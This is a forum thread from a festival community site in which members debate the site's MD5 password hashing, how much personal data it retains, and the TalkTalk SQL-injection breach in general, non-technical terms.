Jump to content

Oooh it's all new

Michaels denim shorts

By Michaels denim shorts,
in Chat

 Share

Recommended Posts

  • Replies 368
  • Created
  • Last Reply

Top Posters In This Topic

Popular Days

Top Posters In This Topic

Popular Days

Posted Images

eFestivals Mentor

eFestivals

Posted
Posted

better security than TalkTalk too :P

In all seriousness, it is! :)

This site doesn't hold much in the way of people's personal data - just email addresses, and the associated password, really.

The passwords are encrypted (unlike with Talk Talk), and if the database were stolen those passwords couldn't be used by the hackers (there's no unencrypt for the way the passwords are stored).

The database could be stolen, but it never has been. I know this because of some of the email addies of mine which are in it, which only exist in the database here. I take website security seriously, but I'm not so daft as to think it couldn't happen here. In many ways I'm very surprised that it never has, and I keep my fingers firmly crossed that it never will.

One of the reasons I use PayPal for taking payments is to avoid the risk of that data being stolen from here (as well as removing the maintenance overheads of keeping that data safe with security patches//upgrades).

Link to comment
Share on other sites
stuartbert two hats Grand Master

stuartbert two hats

Posted
Posted (edited)

In all seriousness, it is! :)

This site doesn't hold much in the way of people's personal data - just email addresses, and the associated password, really.

The passwords are encrypted (unlike with Talk Talk), and if the database were stolen those passwords couldn't be used by the hackers (there's no unencrypt for the way the passwords are stored).

 

I bet it could be eventually ;) What algorithm are you using?

Edited by stuartbert two hats
Link to comment
Share on other sites
gizmoman Rising Star

gizmoman

Posted
Posted

That may well have been true prior to the update, but the current STORE setup saves peoples addresses and even if buying gold membership by Paypal receives a postal address from Paypal (it is clearly configured as if purchasing a physical item ), so the site software would have a persons real address on file. The edit profile option allows people to put all sorts of personal data in there including date of birth, you shouldn't be encouraging people to give ANY personal information that isn't strictly required IMO. Also the old 'donate' button has gone which means you can't donate anonymously by Paypal, the new one wants data.

Link to comment
Share on other sites
eFestivals Mentor

eFestivals

Posted
Posted

That may well have been true prior to the update, but the current STORE setup saves peoples addresses and even if buying gold membership by Paypal receives a postal address from Paypal (it is clearly configured as if purchasing a physical item ), so the site software would have a persons real address on file. The edit profile option allows people to put all sorts of personal data in there including date of birth, you shouldn't be encouraging people to give ANY personal information that isn't strictly required IMO. Also the old 'donate' button has gone which means you can't donate anonymously by Paypal, the new one wants data.

you can get names and addresses from things far easier than hacking here (and the amount retained here is very minimal anyway). 

I think you need to put your paranoia away.

Link to comment
Share on other sites
gizmoman Rising Star

gizmoman

Posted
Posted

It's hardly paranoid to believe there are people out there committing identity theft, and it's not unknown for people to sell on data, subscription lists etc, the default option for this forum software seems to be to retain all data, you, or some future owner of this website could make use of this data. I'm not for a second suggesting you WOULD but if the data isn't there in the first place (and there is no need for it to be) then it can't be hacked or sold etc.

Link to comment
Share on other sites
stuartbert two hats Grand Master

stuartbert two hats

Posted
Posted

Md5. Now tell me again it can be unencrypted.

It has no unencrypt, by designt

Oh. Turns out you can get possible values for the original password, but not the exact password, since MD5 hashing is lossy. In fact, it's not technically encrypted at all, it's hashed.

But then, you already knew that didn't you?;)

Having said that, I'll just leave this here: http://security.stackexchange.com/questions/15790/why-do-people-still-use-recommend-md5-if-it-is-cracked-since-1996

Link to comment
Share on other sites
Michaels denim shorts Rookie

Michaels denim shorts

Posted
  • Author
Posted

I think is Md5 still crackable with the salts isn't it?

Not that it's worth cracking the passwords here at all

talktalk was taken by simple SQL injection. Which for those who have no idea, means using software to send requests to the server & saving /compiling the error codes that it returns & populating the entire sites tables, - which is amazing wasn't tightened up years ago something the size of talktalk 

Link to comment
Share on other sites
stuartbert two hats Grand Master

stuartbert two hats

Posted
Posted

I think is Md5 still crackable with the salts isn't it?

Not that it's worth cracking the passwords here at all

talktalk was taken by simple SQL injection. Which for those who have no idea, means using software to send requests to the server & saving /compiling the error codes that it returns & populating the entire sites tables, - which is amazing wasn't tightened up years ago something the size of talktalk 

You'd use rainbow tables to crack MD5. The salt makes it harder to crack, but it's still doable. But from what I can tell, you can work out potential passwords that would hash to the MD5 value in the database, but you couldn't be sure that it was the exact password chosen by the user. Dictionaries of common passwords can help in guessing the most likely candidates, but you can never be sure since MD5 hashing is lossy.

There just isn't enough information in the hash to 100% reconstruct the password.

Link to comment
Share on other sites
stuartbert two hats Grand Master

stuartbert two hats

Posted
Posted

But yeah, SQL Injection vulnerabilities are pretty inexcusable in this day and age. There can be more obscure issues for custom sorts, but they can be easily fixed with whitelisting. The worst thing is, it's bound to have been noticed by at least one of their developers over the years, but seemingly they didn't have a culture that allowed people to speak up and get things fixed.

Link to comment
Share on other sites
Michaels denim shorts Rookie

Michaels denim shorts

Posted
  • Author
Posted

Can't say I've ever tried cracking an md5 hash I just remember reading it was possible. I've obtained the list of hashes & salts (from my own websites) when testing vulnerabilities in modules/plugins. You would think a company the size of talktalk would have been all over that years ago, & not keeping all data at least hashed (preferably completely encrypted) is a big no no, especially if you are holding cc details, and all kinds of sensitive stuff 

Link to comment
Share on other sites
Yoghurt on a Stick Veteran

Yoghurt on a Stick

Posted
Posted

ha, it sounds way more complicated than it is mate, if you have a site that is vulnerable to SQL it only takes a click of an injection tool to do all of ^

I haven't and will never have a clue about any of this stuff. You may as well be talking in Russian for all the understanding that I'm going to gain. Unfortunately I'm a complete technophobe in a time when being so isn't very advantageous. Ho hum.

Link to comment
Share on other sites
Michaels denim shorts Rookie

Michaels denim shorts

Posted
  • Author
Posted

Anyone know if there is a 'delete all' function for quoted text in the reply box on the mobile version?  I can only delete one character at a time which given the size of the post I quoted in error is a right pain.

on iphone you can just highlight and delete, I presume it's the same for android? 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.


×
×
  • Create New...